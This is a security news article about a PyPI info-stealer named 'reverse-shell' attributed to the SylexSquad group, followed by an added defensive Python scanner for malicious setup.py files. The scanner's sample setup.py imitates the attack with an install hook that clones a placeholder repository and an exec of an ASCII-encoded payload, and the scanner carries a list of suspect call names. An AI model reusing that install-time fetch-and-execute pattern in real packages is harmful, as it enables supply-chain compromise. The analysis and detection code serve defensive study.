Blatantly Obvious: Spyware Offered to Cyberattackers via PyPI Python Repository

Published: 23/11/2024   Category: security

Malware-as-a-service hackers from Spain decided to use a public code repository to openly advertise their wares.

Researchers have discovered malware peddlers advertising an info-stealer out in the open on the Python Package Index (PyPI) — the official, public repository for the Python programming language — with only the thinnest veneer of obfuscation.
The perpetrators — whom researchers from Sonatype associated with a Spain-based malware-as-a-service (MaaS) gang called SylexSquad — gave their program a not-so-subtle name: reverse-shell. Reverse shells are programs that hackers commonly use to run commands remotely and receive data from targeted computers.
"I think what's quite funny about this is that it's just so blatant," says Dan Conn, developer advocate at Sonatype. "Perhaps SylexSquad were advertising themselves, or they simply didn't care about being caught."
However, their brazenness doesn't end there.
Sonatype researchers did a double-take when they found a package called reverse-shell uploaded to a public forum. "Why would someone name a malicious package in such a blatantly obvious way?" the researchers wondered in their Malware Monthly blog post.
The program turned out to be much more than a reverse shell, in fact. That became clear when the researchers examined one of its files, called WindowsDefender.py.
WindowsDefender.py includes various obviously named functions, including get_login_data(), get_web_history(), get_downloads(), get_cookies(), get_credit_cards(), and ImageGrab.grab(). Per the theme, the hackers had not tried hard to conceal their intentions: this was malware designed to steal information.
"With no obfuscation, [this] appears to be ... a Discord bot that executes commands and performs actions on the infected machine," according to the analysis. "The malware can retrieve cookies, take screenshots, run shell commands, steal browsing history, and send all this data to the attacker's Discord channel."
Further answers lay in another file, setup.py. Here, there were several Spanish-language instructions to "Clone GitHub repository and execute file," "replace with URL of your GitHub repository," and "path where you want to clone the repo" — an indication that reverse-shell was a MaaS product.
Further digging uncovered multiple "Made by SylexSquad" tags scattered in the code, some of which was lightly obfuscated.
SylexSquad, the researchers found, was once a hacking marketplace operating over the Sellix e-commerce platform in 2022. It has since been shut down.
Publishing so openly to a public repo may have been a way for the group to intentionally draw attention to their product. "How do we know about groups like Anonymous or LulzSec or Killnet?" Conn asks, rhetorically. "It's because they get a reputation."
But PyPI holds much more value to them than that.
The SylexSquad attackers aren't the only miscreants utilizing forums like PyPI and GitHub, and there are many reasons for such brazenness, according to Sonatype.
"Hosting malicious files on a public repository provides bad actors more control over them," the researchers explained in their blog. "It gives them the power of deleting, upgrading, or even doing version control of the payload."
Among other benefits, "it allows the malware to be shared a lot more widely," Conn elaborates, "and it might actually trip up, in particular, a lot of antivirus software that uses generic signatures — like, actual bytes — to store whether something is malicious or not."
In other words, rather than delivering malware upfront — which antivirus scanners can pick up on quickly — hackers can simply link to their malicious code elsewhere: "By providing a link to a GitHub, they're maybe circumventing that check," he notes.
Public repositories have protective measures in place to avoid becoming a hub for hackers. Still, even the best scanners and moderators aren't perfect, and they can't be everywhere at once.
"Hackers take certain measures like encoding or otherwise obfuscating the code they host, to make it a little bit more difficult for automated engines to pick up," Juan Aguirre, security researcher at Sonatype, points out. In this case, SylexSquad encoded their malicious script as numbers, using easily reversible ASCII codes corresponding to each character.
In this case, Sonatype reported the package to the PyPI maintainers and it was taken down. "But it's just a game of cat and mouse," Aguirre says. "Someone catches them and they just run to the next spot."
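The two tricks described above, a setup.py that fetches and runs code from a remote repository at install time, and a script hidden as a list of ASCII codes, are both easy to spot statically before a package is ever installed. The following is an added defender-side example, not Sonatype's tooling or the SylexSquad package: it parses a constructed setup.py with Python's `ast` module, flags install-time execution and fetch calls, and decodes integer lists that read as printable ASCII so a reviewer can see what they hide. The sample setup.py, its placeholder URL and the list of suspect call names are all assumptions made for the demonstration.

```python
import ast

# Constructed sample in the shape the article describes (not SylexSquad's code):
# an install hook that clones a remote repo, plus a payload hidden as ASCII codes.
SAMPLE_SETUP_PY = '''\
import subprocess
from setuptools import setup
from setuptools.command.install import install
payload = [112, 114, 105, 110, 116, 40, 34, 104, 105, 34, 41]  # print("hi")
exec("".join(chr(c) for c in payload))
class PostInstall(install):
    def run(self):
        # Clone the GitHub repository and execute the file (placeholder URL)
        subprocess.call(["git", "clone", "https://github.invalid/example/repo"])
        install.run(self)
setup(name="reverse-shell", version="0.1", cmdclass={"install": PostInstall})
'''

# Call targets that indicate code execution or remote fetching at install time (assumed list).
SUSPECT_CALLS = {"exec", "eval", "os.system", "subprocess.call", "subprocess.run",
                 "subprocess.Popen", "urllib.request.urlopen", "requests.get"}

def _dotted(node):
    """Dotted name of a call target, e.g. 'subprocess.call'; '' if not a name."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""

def decode_ascii_lists(tree, min_len=8):
    """Return (lineno, text) for int-list literals that decode to printable ASCII."""
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.List) and len(node.elts) >= min_len:
            vals = [e.value for e in node.elts
                    if isinstance(e, ast.Constant) and isinstance(e.value, int)]
            if len(vals) == len(node.elts) and all(32 <= v < 127 for v in vals):
                hits.append((node.lineno, "".join(chr(v) for v in vals)))
    return hits

def scan_setup_py(source):
    """Flag suspect calls and decode numeric payloads; returns sorted (lineno, note)."""
    tree = ast.parse(source)
    findings = [(n.lineno, f"call:{_dotted(n.func)}") for n in ast.walk(tree)
                if isinstance(n, ast.Call) and _dotted(n.func) in SUSPECT_CALLS]
    findings += [(ln, f"ascii-list:{text}") for ln, text in decode_ascii_lists(tree)]
    return sorted(findings)
```

Running `scan_setup_py(SAMPLE_SETUP_PY)` reports the decoded payload on line 4, the `exec` on line 5 and the `subprocess.call` in the install hook on line 9; the same check can be pointed at the sdist of any dependency before it is installed.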
Aguirre views this story in light of a broader concern with open source software — that, as long as malware authors find use in public repositories, organizations must be aware of the kinds of packages they might be sweeping up.
"It's important to understand what it is that you're running," he concludes. "This is a great case for that. You have to have a bill of materials, you've got to know what you're doing, and what dependencies you're using. If you're just blindly installing things and grabbing code you see, things like this could very easily get into your system."
